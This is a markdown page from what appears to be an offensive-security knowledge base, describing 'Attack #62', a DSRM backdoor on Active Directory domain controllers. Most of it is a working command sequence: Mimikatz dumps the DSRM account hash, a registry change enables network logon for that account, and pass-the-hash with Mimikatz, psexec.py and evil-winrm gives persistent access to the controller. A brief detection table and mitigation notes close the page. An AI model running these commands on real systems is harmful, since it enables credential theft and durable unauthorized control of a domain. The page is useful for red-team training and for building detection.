attack-62-dsrm-backdoor-abuse.md (3394B)
1 --- 2 title: "Attack #62 โ DSRM Backdoor Abuse" 3 description: "Every DC has a Directory Services Restore Mode (DSRM) administrator account with a separate password set during DC promotion. By default, this accountโฆ" 4 category: active-directory 5 subcategory: "Persistence" 6 tags: ["active-directory", "ntlm", "privilege-escalation", "hashing"] 7 tools: ["Mimikatz", "Evil-WinRM", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Eight/๐ค Attack #62 โ DSRM Backdoor Abuse.md" 11 --- 12 # ๐ค Attack #62 โ DSRM Backdoor Abuse 13 14 *** 15 16 ## ๐ How It Works 17 18 Every DC has a **Directory Services Restore Mode (DSRM)** administrator account with a separate password set during DC promotion. By default, this account can't be used for network logons. However, modifying the registry key `DsrmAdminLogonBehavior` to `2` allows the DSRM administrator to authenticate over the network โ creating a **persistent backdoor** that survives AD credential resets, KRBTGT rotation, and even domain trust rebuilds. 19 20 *** 21 22 ## โ๏ธ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Local admin / SYSTEM on DC** | To modify registry and dump DSRM hash | 27 28 *** 29 30 ## ๐ป Full Commands 31 32 ```powershell 33 # โโ Step 1: Dump DSRM password hash โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 34 mimikatz.exe 35 privilege::debug 36 token::elevate 37 lsadump::sam 38 # Look for: Administrator (local) โ this is the DSRM account hash 39 40 # โโ Step 2: Enable network logon for DSRM โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 41 reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DsrmAdminLogonBehavior /t REG_DWORD /d 2 /f 42 # Value 0 = DSRM only in restore mode (default) 43 # Value 1 = DSRM when AD DS is stopped 44 # Value 2 = DSRM always allowed for network logon โ what we want 45 46 # โโ Step 3: Use DSRM hash for network access โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 47 # PtH with the DSRM Administrator hash: 48 sekurlsa::pth /domain:DC01 /user:Administrator /ntlm:<DSRM_HASH> /run:cmd.exe 49 # Note: /domain is the DC hostname, NOT the domain โ this is the local admin 50 51 # Result: Can access DC01 as .\Administrator forever 52 ``` 53 54 ```bash 55 # โโ From Linux โ PtH with DSRM hash โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 56 psexec.py ./Administrator@DC01.corp.local -hashes :<DSRM_HASH> 57 evil-winrm -i DC01.corp.local -u Administrator -H <DSRM_HASH> 58 ``` 59 60 *** 61 62 ## ๐ก๏ธ Detection โ Event IDs 63 64 | Event ID | Source | What to Look For | 65 |---|---|---| 66 | **4657** | Security Log (DC) | Registry modification โ DsrmAdminLogonBehavior created/changed | 67 | **4624** | Security Log (DC) | Local Administrator logon on DC (not domain admin) | 68 69 *** 70 71 ## ๐ Attack Chain Context 72 73 ``` 74 [DSRM Backdoor] โโโ Permanent DC Access via Local Admin Account 75 โ 76 โโโโ ๐ Survives: KRBTGT rotation, DA password resets, trust rebuilds 77 โโโโ ๐ Only detected by: monitoring DsrmAdminLogonBehavior registry key 78 โโโโ ๐ Defeated by: monitor registry, never set DsrmAdminLogonBehavior to 2 79 ``` 80 81 *** 82 83 > โ **Attack #62 โ DSRM Backdoor complete.**